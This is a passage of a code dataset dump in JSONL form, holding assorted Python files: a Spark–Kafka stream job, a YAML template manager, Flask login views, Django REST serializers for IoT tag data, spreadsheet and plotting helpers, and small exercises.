self.db.executeSQL(sql, (self.dt_id, 'dt', json.dumps(cut_record)))\n\n def activated_all_payment(self):\n sql = \"\"\"select payment_type from dt_payment where dt_id=%s\"\"\"\n payments_db = self.db.selectSQL(sql, (self.dt_id,), use_dict=True, fetchone=False)\n for payment in payments_db:\n payment_type = payment['payment_type']\n update_sql = \"\"\"update dt_payment set activated_status=2 where dt_id=%s and payment_type=%s\"\"\"\n self.db.executeSQL(update_sql, (self.dt_id, payment_type))\n\n sql = \"\"\"INSERT INTO activated_dt_info (dt_id, payment_type, comment, activated_user, activated_status, create_at)\n values(%s, %s,%s, %s, %s, %s)\"\"\"\n self.db.executeSQL(sql, (\n self.dt_id, payment_type, constants.ACTIVATED_STATUS['2'], self.bk_email, 2, self.create_at))\n\n def invalid_past_record(self):\n sql = \"\"\"update daily_cut_record set status=%s,update_at=%s where role_id=%s and role_type=%s and status=1\"\"\"\n self.db.executeSQL(sql, (4, self.create_at, self.dt_id, 'dt'))\n sql = \"\"\"update change_record set status=%s,update_at=%s where dt_id=%s and status=4\"\"\"\n self.db.executeSQL(sql, (5, self.create_at, self.dt_id))\n","sub_path":"python/uline/uline/uline/handlers/app/bank/inlet/dt_auth.py","file_name":"dt_auth.py","file_ext":"py","file_size_in_byte":49056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"65277044","text":"# xls_tool.py\n# Write matrix to a xls or Read matrix from xls\nimport xlrd\nimport xlwt\nfrom typing import List\n\n\ndef write_xls(file_name: str, matrix: List[List]):\n book_out = xlwt.Workbook()\n sheet_out = book_out.add_sheet(file_name)\n for i in range(0, len(matrix)):\n for j in range(0, len(matrix[i])):\n sheet_out.write(i, j, matrix[i][j])\n book_out.save(file_name)\n\n\ndef read_xls(file_name: str, sheet_idx=0, has_head=False, limit=(0, 0)) -> List[List]:\n book = xlrd.open_workbook(file_name)\n sheet = book.sheet_by_index(sheet_idx)\n result_mat = []\n for i in range(1 if has_head else 0, sheet.nrows if limit[0] == 0 else limit[0]):\n result_mat.append([0 if x == \"\" else x for x in sheet.row_values(i)])\n return result_mat\n\n","sub_path":"xls_tool.py","file_name":"xls_tool.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"331709450","text":"from __future__ import print_function\n\nimport avro.schema\nimport tweepy\nimport os\n\nfrom io import BytesIO\nfrom avro.datafile import DataFileReader, DataFileWriter\nfrom avro.io import DatumReader, DatumWriter, BinaryEncoder, BinaryDecoder\nfrom avro.schema import Parse\n\nfrom pyspark.sql import *\nfrom pyspark.sql.types import *\nfrom pyspark.sql.functions import col, explode\n\nos.environ['PYSPARK_SUBMIT_ARGS'] = '--packages org.apache.spark:spark-sql-kafka-0-10_2.11:2.3.0'\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\ndef deserialize(flight_info_bytes) :\n if flight_info_bytes is not None:\n bytes_reader = BytesIO(flight_info_bytes)\n decoder = BinaryDecoder(bytes_reader)\n schema_flight_info = Parse(open(dir_path + \"/flight-info.schema.avsc\", \"rb\").read())\n reader = DatumReader(schema_flight_info)\n flight_info = reader.read(decoder)\n return [{\"id\": \"1\"}, {\"id\": \"2\"}]\n else:\n return None\n\ndef serialize(tweets) :\n if tweets is not None:\n schema_tweet = avro.schema.Parse(open(dir_path + \"/tweet.schema.avsc\", \"rb\").read())\n\n writer = DatumWriter()\n bytes_writer = BytesIO()\n encoder = BinaryEncoder(bytes_writer)\n writer.write_array(schema_tweet, tweets, encoder)\n tweets_bytes = bytes_writer.getvalue()\n return tweets_bytes\n else:\n return None\n\ndef initialize() :\n\n spark = SparkSession \\\n .builder \\\n .appName(\"search-flight-spark-ml-stream\") \\\n .getOrCreate()\n\n search_flight_df = spark \\\n .readStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"kafka.vnet:9092\") \\\n .option(\"subscribe\", \"flightInfoTopic\") \\\n .option(\"auto.offset.reset\", \"latest\") \\\n .option(\"group.id\", \"mitosis\") \\\n .load()\n\n flight_info_schema_data_type = StructType([\n StructField(\"departingId\", StringType(), False),\n StructField(\"arrivingId\", StringType(), False),\n StructField(\"tripType\", StringType(), False),\n StructField(\"departureDate\", StringType(), False),\n StructField(\"arrivalDate\", StringType(), False),\n StructField(\"passengerNumber\", IntegerType(), False),\n StructField(\"cabinClass\", StringType(), False),\n ])\n\n tweet_schema_data_type = StructType([\n StructField(\"id\", StringType(), False)\n ])\n\n spark.udf.register(\"deserialize\", deserialize, flight_info_schema_data_type)\n spark.udf.register(\"serialize\", serialize)\n\n search_flight_ds = search_flight_df\\\n .selectExpr(\"key\", \"deserialize(value) as tweets\")\\\n .selectExpr(\"key\", \"serialize(tweets) as value\")\\\n .selectExpr(\"CAST(key AS STRING)\", \"CAST(value AS BINARY)\")\n\n search_flight_ds \\\n .writeStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"kafka.vnet:9092\") \\\n .option(\"topic\", \"tweetsTopic\") \\\n .option(\"group.id\", \"mitosis\") \\\n .option(\"checkpointLocation\", \"/tmp/checkpoint\") \\\n .start() \\\n .awaitTermination()\n\n spark.stop()\n\nif __name__ == \"__main__\":\n initialize()\n","sub_path":"ml/spark/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"423456938","text":"import json\nimport re\nimport jsonschema\nimport base64\nimport uuid\nimport time\nimport os\nimport yaml\n\n\nclass TemplateManager():\n \"\"\"\n 쿠버네티스처럼 YAML 파일로 이루어진 템플릿을 쉽게 템플릿의 타입에 따라 다르게 처리해주는 패키지입니다.\n \"\"\"\n\n def __init__(self, templates_dir):\n \"\"\"\n Parameters\n ----------\n\n * `(required) templates_dir`: str\n\n 템플릿들이 있�� 폴더 경로입니다.\n\n \"\"\"\n\n self._template_schema = self._get_template_schema()\n\n self._kinds = {}\n self._templates = {}\n\n for path in self._find_all_by_name(templates_dir, r\".+\\.yaml\"):\n self._load_template(path, update=False)\n\n def register(self, kind, worker, options={}, template_schema={}, process_schema={}):\n \"\"\"\n 템플릿을 처리할 방식을 등록 할 때 사용합니다.\n\n Parameters\n ----------\n\n * `(required) kind`: str\n\n 템플릿 타입 이름입니다.\n\n * `(required) worker`: function\n\n 이 타입을 처리해주는 함수입니다. `spec` 과 `args` 매개변수를 반드시 받아야 합니다.\n\n * `spec`: spec key in YAML\n * `args`: 유저가 보내는 매개변수\n\n ```\n def worker(spec, args):\n ...\n ```\n\n * `template_schema`: dict\n\n 템플릿에 사용하는 스키마입니다. 자세한 내용은 [여기](#how_to_use_schmea) 를 참조하세요.\n\n ```json\n {\n \"plus\": {\n \"schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"number_a\": {},\n \"number_b\": {}\n },\n \"required\": [\n \"number_a\", \"number_b\"\n ]\n }\n }\n }\n ```\n\n * `process_schema`: dict\n\n Process 함수가 사용하는 스키마입니다. 자세한 내용은 [여기](#how_to_use_schmea) 를 참조하세요.\n\n ```json\n {\n \"first_word_getter\": {\n \"schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"sentence\": {}\n }\n },\n \"properties\": {\n \"sentence\": {\n \"default\": \"Hello World\"\n }\n }\n }\n } \n ```\n\n * `(deprecated) options`: dict\n\n 패키지가 경량화되며 deprecated 된 옵션입니다.\n\n\n Returns\n -------\n\n 오류가 없다면 항상 True 를 반환합니다. \n \"\"\"\n\n self._kinds[kind] = {\n \"kind\": kind,\n \"worker\": worker,\n \"options\": options,\n \"template_schema\": template_schema,\n \"process_schema\": process_schema\n }\n\n return True\n\n def get(self, name):\n \"\"\"\n 템플릿의 정보를 가져올 때 사용합니다.\n\n **Parameters**\n\n * `(required) name`: str\n\n 템플릿의 이름입니다.\n\n **Returns**\n\n `템플릿 정보`: dict \n \"\"\"\n self._validate_template(name)\n return self._templates[name]\n\n def find(self, kind=\"\", category=None, tags=[], meta={}):\n \"\"\"\n 템플릿들을 찾을 때 사용합니다.\n\n **Parameters**\n\n * `kind`: str\n\n kind 로 템플릿들을 찾습니다.\n\n ```python\n \"plus\"\n ```\n\n * `category`: str\n\n category 로 템플릿들을 찾습니다.\n\n ```python\n \"fruit\"\n ```\n\n * `tags`: list\n\n tags 로 템플릿들을 찾습니다.\n\n 요청한 태그들이 모두 매치되어야 합니다.\n\n ```json\n [\"apple\", \"banana\"]\n ```\n\n * `meta`: dict\n\n meta 로 템플릿들을 찾습니다.\n\n tags 가 배열이라면 meta 는 dict 형식입니다.\n\n ```json\n {\n \"fruit\": \"apple\"\n }\n ```\n\n **Returns**\n\n `template name list`: list\n \"\"\"\n result = []\n\n for name in self._templates:\n\n piece = self.get(name)\n\n if kind != \"\":\n if kind != piece[\"kind\"]:\n continue\n\n if isinstance(category, str):\n if category != piece[\"category\"]:\n continue\n\n if len(meta) != 0:\n if not self._is_obj_looking_for(piece[\"meta\"], meta):\n continue\n\n if len(tags) != 0:\n if not self._is_array_looking_for(piece[\"tags\"], tags):\n continue\n\n result.append(name)\n\n return result\n\n def get_spec(self, name):\n self._validate_template(name)\n return self.get(name)[\"origin\"][\"spec\"]\n\n def get_kind(self, name):\n self._validate_template(name)\n\n return self.get(name)[\"origin\"][\"kind\"]\n\n def process(self, name, args={}):\n \"\"\"\n Register 에서 등록한 방식대로 템플릿을 처리 할 때 사용합니다.\n\n **Parameters**\n\n * `(required) name`: str\n\n 템플릿의 이름입니다.\n\n * `(required) args`: dict\n\n Worker 에게 보낼 매개변수입니다.\n\n **Returns**\n\n `Wokrer 가 처리한 결과`\n \"\"\"\n\n self._update_template(name)\n\n if \"process_schema\" in args and args[\"process_schema\"] != {}:\n args = self._get_validated_obj(args, args[\"process_schema\"])\n\n kind_info = self._kinds[self.get(name)[\"kind\"]]\n worker = kind_info[\"worker\"]\n\n if not worker:\n raise ValueError(f\"{name}'s worker is not exsists.\")\n\n return worker(self.get(name)[\"origin\"][\"spec\"], args)\n\n def _update_template(self, name):\n self._validate_template(name)\n\n return self._load_template(self.get(name)[\"path\"], update=True)\n\n def _load_template(self, path, update):\n with open(path, \"r\", encoding=\"utf-8\") as fp:\n\n loaded_template = yaml.full_load_all(fp.read())\n\n for index, raw_template in enumerate(loaded_template):\n\n self._get_validated_obj(\n raw_template, self._template_schema)\n\n kind = raw_template[\"kind\"]\n name = raw_template[\"name\"]\n meta = raw_template[\"meta\"]\n raw_template[\"spec\"] = raw_template.get(\"spec\", {})\n random_name = False\n\n if name == \"random\":\n name = base64.b64encode(\n (path + str(index)).encode()).decode()\n random_name = True\n\n category = raw_template[\"category\"]\n tags = raw_template[\"tags\"]\n\n if name in self._templates and update == False:\n raise ValueError(f\"name already exists. name is {name}\")\n\n if kind == \"\":\n raise ValueError(\"kind is empty.\")\n\n if name == \"\":\n raise ValueError(\"name is empty.\")\n\n if category == \"\":\n raise ValueError(\"category is empty.\")\n\n if not isinstance(meta, dict):\n raise ValueError(f\"meta is not a dict. meta is {meta}\")\n\n # spec validate\n if \"template_schema\" in raw_template and raw_template[\"template_schema\"] != {}:\n raw_template[\"spec\"] = self._get_validated_obj(\n raw_template[\"spec\"], raw_template[\"template_schema\"])\n\n self._templates[name] = {\n \"kind\": kind,\n \"name\": name,\n \"category\": category,\n \"tags\": tags,\n \"origin\": raw_template,\n \"path\": path,\n \"meta\": meta,\n \"random_name\": random_name\n }\n\n def _validate_template(self, name):\n if name not in self._templates:\n raise ValueError(\n \"name is not exists in templates. name is [%s]\" % name)\n\n def _get_validated_obj(self, obj, schema_item):\n\n schema = schema_item.get(\"schema\", {})\n properties = schema_item.get(\"properties\", {})\n\n for name in properties:\n prop = properties[name]\n\n for key in prop:\n if key == \"default\":\n default = prop[key]\n if name not in obj:\n obj[name] = default\n\n for key in prop:\n value = obj[name]\n if key == \"change_type\":\n type_name = prop[key]\n obj[name] = self._set_type(type_name, value)\n try:\n jsonschema.validate(obj, schema)\n except Exception as e:\n raise ValueError(f\"validate failed. {e}\")\n\n return obj\n\n def _is_obj_looking_for(self, obj: dict, user_obj: dict):\n\n o = obj.copy()\n uo = user_obj.copy()\n\n o.update(uo)\n\n if o == obj:\n return True\n\n return False\n\n def _is_array_looking_for(self, array: list, user_array: list):\n\n a = array.copy()\n ua = user_array.copy()\n\n a += ua\n\n if set(a) == set(array):\n return True\n\n return False\n\n def _find_all_by_name(self, start_dir, regex):\n finded_files = []\n compiled_regex = re.compile(regex)\n\n for root, _, files in os.walk(start_dir):\n for filename in files:\n if compiled_regex.findall(filename):\n finded_files.append(os.path.join(\n root, filename).replace(\"\\\\\", \"/\"))\n\n return finded_files\n\n def _set_type(self, type_name, value):\n\n if type_name == \"int\":\n return int(value)\n elif type_name == \"float\":\n return float(value)\n elif type_name == \"string\":\n return str(value)\n elif type_name == \"bool\":\n if value == \"true\" or value == \"True\":\n return True\n elif value == \"false\" or value == \"False\":\n return False\n else:\n raise ValueError(f\"invalid bool value. value is [{value}]\")\n else:\n raise ValueError(\"invalid set type name %s\" % (type_name))\n\n def _get_template_schema(self):\n return {\n \"properties\": {\n \"name\": {\n \"default\": \"random\"\n },\n \"category\": {\n \"default\": \"default\"\n },\n \"tags\": {\n \"default\": []\n },\n \"spec\": {\n \"default\": {}\n },\n \"meta\": {\n \"default\": {}\n }\n },\n \"schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"kind\": {},\n \"name\": {},\n \"category\": {},\n \"tags\": {\n \"type\": \"array\"\n },\n \"spec\": {\n \"type\": \"object\"\n },\n \"meta\": {\n \"type\": \"object\"\n }\n },\n \"required\": [\n \"kind\"\n ]\n }\n }\n","sub_path":"template_manager/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"163505375","text":"from flask import render_template, flash, redirect, session, url_for, request, g\nfrom flask.ext.login import login_user, logout_user, current_user, login_required\n\n#from app the package import app the variable, i think\nfrom app import app, db, lm, oid\n\n#not sure what the . is about\nfrom .forms import LoginForm, EditForm\nfrom .models import User\n\nfrom datetime import datetime\n\n@lm.user_loader\ndef load_user(id):\n return User.query.get(int(id))\n\n@app.route('/')\n@app.route('/index')\n@login_required\ndef index():\n user = g.user\n posts = [ #fake array of posts\n {\n 'author': {'nickname': 'John'},\n 'body': 'A beautiful day in PDX'\n },\n {\n 'author': {'nickname': 'Susan'},\n 'body': \"The avengers was so cool!\"\n }\n ]\n return render_template('index.html',\n title='Home',\n user=user,\n posts=posts)\n\n@app.route('/login', methods=['GET', 'POST'])\n@oid.loginhandler #tells Flask-OpenID that this is our login view function\ndef login():\n if g.user is not None and g.user.is_authenticated: #g is global\n return redirect(url_for('index'))\n form = LoginForm()\n #will validate as False with no data, so the form will be rendered\n #if validates successfully will redirect\n #if doesn't validate will render form again\n if form.validate_on_submit():\n #store boolean in flask session\n session['remember_me'] = form.remember_me.data\n return oid.try_login(form.openid.data, ask_for=['nickname', 'email'])\n return render_template(\n 'login.html',\n title='Sign In',\n form=form,\n providers=app.config['OPENID_PROVIDERS']\n )\n\n#resp arg contains information return by the OpenID provided\n\n@oid.after_login\ndef after_login(resp):\n #require an email to login\n if resp.email is None or resp.email == \"\":\n flash('Invalid login. Try again.')\n return redirect(url_for('login'))\n #search db for the email provided\n #if not found, this is a new user, add to DB\n user = User.query.filter_by(email=resp.email).first()\n if user is None:\n nickname = resp.nickname\n if nickname is None or nickname == \"\":\n nickname = resp.email.split('@')[0]\n user = User(nickname=nickname, email=resp.email)\n db.session.add(user)\n db.session.commit()\n remember_me = False\n if 'remember_me' in session:\n remember_me = session['remember_me']\n session.pop('remember_me', None)\n login_user(user, remember = remember_me)\n return redirect(request.args.get('next') or url_for('index'))\n\n\n#Any functions that are decorated with before_request will run before the view function each time a request is received.\n@app.before_request\ndef before_request():\n #takes current-user set by Flask-Login and put into global g\n g.user = current_user\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n#argument passed into the route decorator will be passed to the function\n@app.route('/user/')\n@login_required\ndef user(nickname):\n user = User.query.filter_by(nickname=nickname).first()\n if user == None:\n flash('User {} not found'.format(nickname))\n return redirect(url_for('index'))\n posts = [\n {'author': user, 'body': 'Test post #1'},\n {'author': user, 'body': 'Test post #2'}\n ]\n return render_template('user.html', user=user, posts=posts)\n\n@app.route('/edit', methods=['GET', 'POST'])\n@login_required\ndef edit():\n form = EditForm()\n if form.validate_on_submit():\n g.user.nickname = form.nickname.data\n g.user.about_me = form.about_me.data\n db.session.add(g.user)\n db.session.commit()\n flash(\"Your changes have been saved\")\n return redirect(url_for('edit'))\n else:\n form.nickname.data = g.user.nickname\n form.about_me.data = g.user.about_me\n return render_template('edit.html', form=form)\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('404.html'), 404\n\n@app.errorhandler(500)\ndef internal_error(error):\n db.session.rollback()\n return render_template('500.html'), 500\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"465127467","text":"# MinHashing : A class MinHashing that builds a minHash signature (in the form of \n# a vector or a set) of a given length n from a given set of integers (a set of hashed shingles).\n\nimport random\n\nclass MinHashing(object):\n def __init__():\n super(MinHashing, self).__init__()\n\n def next_prime(n):\n a = n\n b = 2*n\n\n for p in range(a, b):\n for i in range(2, p):\n if p % i == 0:\n break\n else:\n return p\n return None\n\n def random_coeff(k, max_value):\n rand_list = []\n while k > 0:\n rand_ix = random.randint(1, max_value) \n while rand_ix in rand_list:\n rand_ix = random.randint(1, max_value) \n rand_list.append(rand_ix)\n k = k - 1 \n return rand_list\n\n\n\n\n\n\n\n","sub_path":"finding_similar_items/min_hashing.py","file_name":"min_hashing.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"550078486","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\n\nx = [1,2,3]\ny = [1,4,9]\n\n# plt.plot(x, y)\n# plt.title('whatever')\n# plt.xlabel(\"x-axis\")\n# plt.ylabel(\"y-axis\")\n# plt.show()\n\ndata = pd.read_csv('countries.csv')\n# us_data = data[data.country == 'United States']\n# china_data = data[data.country == 'China']\n# \n# plt.plot(us_data.year, us_data.population/10**6)\n# plt.plot(us_data.year, china_data.population/10**6)\n# plt.legend(['United States', 'China'])\n# plt.xlabel('year')\n# plt.ylabel('population')\n# plt.show()\n\ntestdata = data[data.country == 'China']\nprint(testdata)\n","sub_path":"scrap/matplot.py","file_name":"matplot.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"336085072","text":"n, inp = input(\"Enter Input : \").split(\"/\")\nn = int(n)\ninp = inp.split()\ninp = list(map(int, inp))\n\nif (n+1)//2 >= len(inp):\n i = 0\n while len(inp) < n:\n inp.insert(0, -111)\n i += 1\n\n def cal(cur):\n\n if inp[cur] != -111:\n return\n\n cal(2*cur+1)\n cal(2*cur+2)\n\n x = min(inp[2*cur+2], inp[2*cur+1])\n inp[cur] = x\n inp[2*cur+1] -= x\n inp[2*cur+2] -= x\n\n\n cal(0)\n print(sum(inp))\n\nelse:\n print(\"Incorrect Input\")","sub_path":"7TreeAVL/3TreeRough.py","file_name":"3TreeRough.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"592809091","text":"\"\"\"\nSession (TradingSession or BackTestSession)\n strategy\n data_handler\n portfolio_handler:\n strategy\n position_sizer\n risk_manager\n statistics\n compliance\n execution_handler\n\"\"\"\nimport datetime\nimport queue as queue\n\nfrom yatt.price import Price\nfrom yatt.position_sizer import FixedPositionSizer\nfrom yatt.risk_manager import DefaultRiskManager\nfrom yatt.portfolio import PortfolioHandler\nfrom yatt.compliance import CsvTradeLogCompliance\nfrom yatt.execution_handler import IBSimulatedExecutionHandler\nfrom yatt.statistics import TearsheetStatistics\nfrom yatt.event import MarketEvent, OrderEvent, SignalEvent, FillEvent\n\n\nclass Session(object):\n \"\"\"\n Session base class: Do not instantiate\n \"\"\"\n def __init__(self, strategy, data_handler, trading, **kwargs):\n self.trading = trading\n # Strategy\n self.strategy = strategy\n # DataHandler\n self.data_handler = data_handler\n # PositionSizer\n position_sizer = kwargs.pop('position_sizer', FixedPositionSizer())\n # RiskManager\n risk_manager = kwargs.pop('risk_manager', DefaultRiskManager())\n # Statistics\n statistics = kwargs.pop('statistics', TearsheetStatistics())\n # PortfolioHandler\n self.portfolio_handler = kwargs.pop('portfolio_handler',\n PortfolioHandler(strategy=strategy,\n position_sizer=position_sizer,\n risk_manager=risk_manager,\n statistics=statistics))\n\n strategy_name = self.strategy.name if self.trading else self.strategy.name + ' backtest'\n self.compliance = kwargs.pop('compliance', CsvTradeLogCompliance(strategy_name=strategy_name, **kwargs))\n # ExecutionHandler\n self.execution_handler = kwargs.pop('execution_handler', IBSimulatedExecutionHandler())\n # Event Queue\n self.events_queue = kwargs.pop('events_queue', queue.Queue())\n for o in [self.data_handler.streamer, self.strategy, self.portfolio_handler, self.execution_handler]:\n setattr(o, 'events_queue', self.events_queue)\n self.statistics = self.portfolio_handler.statistics\n # self.cur_time = None\n\n def _continue_loop_condition(self):\n raise NotImplementedError\n\n def _run_session(self):\n while self._continue_loop_condition():\n try:\n event = self.events_queue.get(False)\n except queue.Empty:\n self.data_handler.stream_next()\n else:\n if event is not None:\n if isinstance(event, MarketEvent):\n # self.cur_time = event.timestamp\n self.strategy.calculate_signals(event)\n self.portfolio_handler.on_market_event(event)\n elif event.type == SignalEvent:\n self.portfolio_handler.on_signal(event)\n elif event.type == OrderEvent:\n self.execution_handler.execute_order(event)\n elif event.type == FillEvent:\n self.portfolio_handler.on_fill(event)\n self.compliance.record_trade(event)\n else:\n raise NotImplemented('Unsupported event type!')\n\n def start(self):\n raise NotImplementedError\n\n\nclass TradingSession(Session):\n def __init__(self, **kwargs):\n super().__init__(trading=True, **kwargs)\n self.end_session_time = kwargs.pop('end_session_time', self.strategy.end_trading_time)\n if self.end_session_time is None:\n raise Exception('Must specify an end_session_time when live trading')\n\n def _continue_loop_condition(self):\n return datetime.datetime.now() < self.end_session_time\n\n def start(self, testing=False):\n print(('Running Trading Session until {0}'.format(self.end_session_time)))\n self._run_session()\n results = self.statistics.statistics\n print('---------------------------------')\n print('Trading completed.')\n return results\n\n\nclass BackTestSession(Session):\n def __init__(self, **kwargs):\n super().__init__(trading=False, **kwargs)\n self.start_date = kwargs.pop('start_date', datetime.datetime(1970, 1, 1))\n self.end_date = kwargs.pop('end_date', datetime.datetime.today())\n self.plot = kwargs.pop('plot', True)\n\n def set_date(self, start_date=None, end_date=None):\n if start_date:\n self.start_date = start_date\n self.data_handler.streamer.start_date = start_date\n if end_date:\n self.end_date = end_date\n self.data_handler.streamer.end_date = end_date\n\n def reset(self):\n self.statistics.reset()\n self.data_handler.streamer.reset()\n\n def _continue_loop_condition(self):\n return self.data_handler.streamer.continue_backtest\n\n def start(self):\n self.reset()\n print('Running Backtest...')\n self._run_session()\n results = self.statistics.statistics\n print('---------------------------------')\n print('Backtest completed.')\n print(self.statistics)\n if self.plot:\n self.statistics.plot_results()\n return results\n","sub_path":"yatt/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":5453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"348322026","text":"import numpy as np\ndef many_any(inputlist, k):\n nplist = np.array(inputlist)\n nplist = nplist == True\n countTrue=0;\n for tst in nplist:\n if (tst==1):\n countTrue+=1;\n if (countTrue==k):\n return True\n else:\n return False;\n \nOutput = many_any([True,False,False,True,False,True,False,False],5)\n\nprint(\"The Number of True Equals is:\"+str(Output));\n\nOutput = many_any([True,False,False,True,False,True,True,True],5)\n\nprint(\"The Number of True Equals is:\"+str(Output));\n\n","sub_path":"April 2018/Python Course 2018/python_hw6/many_any.py","file_name":"many_any.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"536228607","text":"# -*- coding: utf-8 -*-\n\nval = []\n\nwhile True:\n valor = int(input())\n if valor != 0:\n val.append(valor)\n else:\n break\n\nfor i in val:\n col = [2 ** h for h in range(i)]\n string = '{:' + str(len(str(col[i - 1] * (2 ** (i - 1))))) + 'd}'\n for k in col:\n for l in range(i):\n print(string.format(k * (2 ** l)), end=' ' if l < i - 1 else '\\n')\n print('')","sub_path":"python/1557.py","file_name":"1557.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"296468413","text":"#--- IOT_Server - api app serializers ----------------------------------------------\n#--- Original Release: December 2018\n#--- By: Conrad Eggan\n#--- Email: Conrade@RedCatMfg.com\n\nfrom rest_framework import serializers\nfrom api.models import Devices, Tags, ValueTypes, IotData\nfrom distutils.util import strtobool\n\n\nclass DeviceSerializer(serializers.ModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n class Meta:\n model = Devices\n fields = ('device_id', 'owner', 'name', 'description', 'type')\n\n\nclass OwnedDevices(serializers.PrimaryKeyRelatedField):\n #Limit device list to those owned by request.user\n def get_queryset(self):\n user = self.context['request'].user\n queryset = Devices.objects.filter(owner=user)\n return queryset\n\n\nclass TagSerializer(serializers.ModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n device = OwnedDevices(many=False)\n class Meta:\n model = Tags\n fields = ('tag_id', 'owner', 'name', 'description', 'device', 'value_type')\n\n\nclass DeviceTags(serializers.ModelSerializer):\n class Meta:\n model = Tags\n fields = ('tag_id', 'name', 'description', 'value_type')\n\n\nclass DeviceTagSerializer(serializers.ModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n device_tags = DeviceTags(many=True, read_only=True)\n\n class Meta:\n model = Devices\n fields = ('device_id', 'owner', 'name', 'description', 'type', 'device_tags')\n\n\nclass ValTypeSerializer(serializers.ModelSerializer):\n class Meta:\n model = ValueTypes\n fields = ('value_type_id', 'name', 'type')\n\n\nclass OwnedTags(serializers.PrimaryKeyRelatedField):\n #Limit tag list to those owned by request.user\n def get_queryset(self):\n user = self.context['request'].user\n queryset = Tags.objects.filter(device__owner=user)\n return queryset\n\n\nclass TagDataSerializer(serializers.ModelSerializer):\n value = serializers.CharField(max_length=100)\n type = serializers.CharField(read_only=True, source='tag.value_type.type')\n owner = serializers.ReadOnlyField(source='owner.username')\n tag = OwnedTags(many=False)\n\n class Meta:\n model = IotData\n fields = ('tag','owner','type','value','timestamp')\n\n def to_internal_value(self, data):\n values = super().to_internal_value(data)\n\n #Get value type for tag POSTED\n tag_type = Tags.objects.select_related('value_type').get(pk=data['tag']).value_type.type\n \n val = str(data['value'])\n\n #-- Save value POSTED in appropriate field based on tag value type --\n #Handle boolean value\n if tag_type == 'bool':\n try:\n values['value_bool'] = strtobool(val)\n except ValueError:\n msg = 'Boolean value required. (True, Yes, Y, On, 1, False, No, N, Off, 0)'\n raise serializers.ValidationError({data['tag']: msg})\n\n #Handle integer value\n elif tag_type == 'int':\n try:\n int(val)\n values['value_int'] = val\n except ValueError:\n raise serializers.ValidationError({data['tag']: 'Integer value required.'})\n \n #Handle decimal value\n elif tag_type == 'dec':\n try:\n float(val)\n except ValueError:\n raise serializers.ValidationError({data['tag']: 'Numeric value required.'})\n #check lengths of decimal number parts\n digit_max = IotData._meta.get_field('value_dec').max_digits\n dec_max = IotData._meta.get_field('value_dec').decimal_places\n if '.' in val:\n val_parts = val.split('.')\n else:\n val_parts = (val, \"0\")\n if len(val_parts[0]) > digit_max - dec_max:\n msg = f'Maximum of {digit_max-dec_max} digits before the decimal point exceeded.'\n raise serializers.ValidationError({data['tag']: msg})\n if len(val_parts[1]) > dec_max:\n msg = f'Maximum of {dec_max} digits after the decimal point exceeded.'\n raise serializers.ValidationError({data['tag']: msg})\n values['value_dec'] = val\n\n #Handle string value\n elif tag_type == 'string':\n values['value_text'] = val\n\n else:\n msg = f'ValueType not defined.'\n raise serializers.ValidationError({data['tag']: msg})\n\n del values['value']\n return values\n\n #Validate request.user is owner of tag\n def validate_tag(self, value):\n if self.context['request'].user != value.owner:\n msg = f\"\"\"Invalid pk \"{value.tag_id}\" - object does not exist.\"\"\"\n raise serializers.ValidationError(msg)\n return value\n\n def create(self, validated_data):\n return IotData.objects.create(**validated_data)\n\n","sub_path":"IOT_Server/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"407796349","text":"#!/usr/bin/env python3\n##\n# Copied from egs/sre10/v1/local/prepare_for_eer.py (commit 9cb4c4c2fb0223ee90c38d98af11305074eb7ef8)\n#\n# Given a trials and scores file, this script\n# prepares input for the binary compute-eer.\nimport sys\ntrials = open(sys.argv[1], 'r').readlines()\nscores = open(sys.argv[2], 'r').readlines()\nspkrutt2target = {}\nfor line in trials:\n spkr, utt, target = line.strip().split()\n spkrutt2target[spkr+utt]=target\nfor line in scores:\n spkr, utt, score = line.strip().split()\n print(\"{} {}\".format(score, spkrutt2target[spkr+utt]))\n","sub_path":"subtools/recipe/serialized-experiments/prepare_for_eer.py","file_name":"prepare_for_eer.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} 